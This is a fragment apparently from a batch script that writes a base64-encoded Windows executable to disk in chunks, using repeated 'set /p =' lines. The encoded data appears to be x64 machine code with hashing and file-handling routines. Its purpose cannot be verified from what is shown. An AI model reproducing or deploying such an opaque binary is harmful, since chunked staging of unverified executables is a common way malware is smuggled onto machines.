JAhIiWwkEEiJdCQYV0FUQVVIg+wgRIvpSIsNmr4AAEmL8UmL6EyL4uj4GQAASItQCEiDYBAASIv4SIXSdGRIixpBg/3/dAZEO2oIdSRJg/z/dAZMO2IQdRhIg/3/dAZIO2oYdQxIg/7/dAxIO3IgdAZIiVcQ6yNIi0cISDvQSA9Ew0iJRwhIi0cQSIXAdANIiRhIiw/oix0AAEiL00iF23WcSItcJEBIi2wkSEiLdCRQSIPEIEFdQVxfw8zMSIlcJAhIiXQkEFdIg+wgSIvxSIsN470AAOhKGQAASIv4SItQCEiDYBAASIXSdDpIixpIOXIYdSVIi0cISDvQSA9Ew0iJRwhIi0cQSIXAdANIiRhIiw/oDR0AAOsESIlXEEiL00iF23XGSItcJDBIi3QkOEiDxCBfw8zMzEBTSIPsIEiL2UiLDci4AADo/wIAAOsSSDlYCHUMSIsNtLgAAOj3AgAASIsNqLgAAOi3AwAASIXAdd1Ig8QgW8NIjQUlAAAASIkFGrkAAEiNBSsEAABIiQUkuQAASI0FZQEAAEiJBS65AADDzEiJXCQISIlsJBBIiXQkGFdBVEFVSIPsIEyL4UmLCUmL6UmL2ESL6ugwAQAASIsNjawAADPSRI1CYP8VxZwAAEiL+EiFwA+EwAAAAIt0JGBIiw1qrAAAuAEAAACF9o1QBw9O8ExjxknB4AP/FZScAABIiUcISIXAdH5IgycAg2dAAINnRABIg2dQAEiLy4l3PEyJZzBEiW84SIlfIEiJb0joqyoAAEiFwHQEg09EAroQAAAASY1MJBBBuAAAAQBEjUr06FUYAABNjUQkELoIAAAASIlHWEiLDeSrAAD/FSKcAABIjQ1TfgAASIlHGEiJSAhIiX0A6xRIiw3CqwAATIvHM9L/FQOcAAAz/0iLXCRASItsJEhIi3QkUEiLx0iDxCBBXUFcX8PMSIlcJAhXSIPsIEiL2kiL+eizAAAASIXAdQ5FM8BIi9NIi8/odAMAAEiLXCQwSIPEIF/DzEiFyQ+EiAAAAEiJXCQIV0iD7CBIi/noXQQAAEiLT1jodBwAAEyLRwhIiw01qwAAM9L/FXmbAABMi0cYSIsNIqsAADPS/xVmmwAATItHUE2FwHQaSIsNCqsAAEmLGDPS/xVL
set /p =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
set /p =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
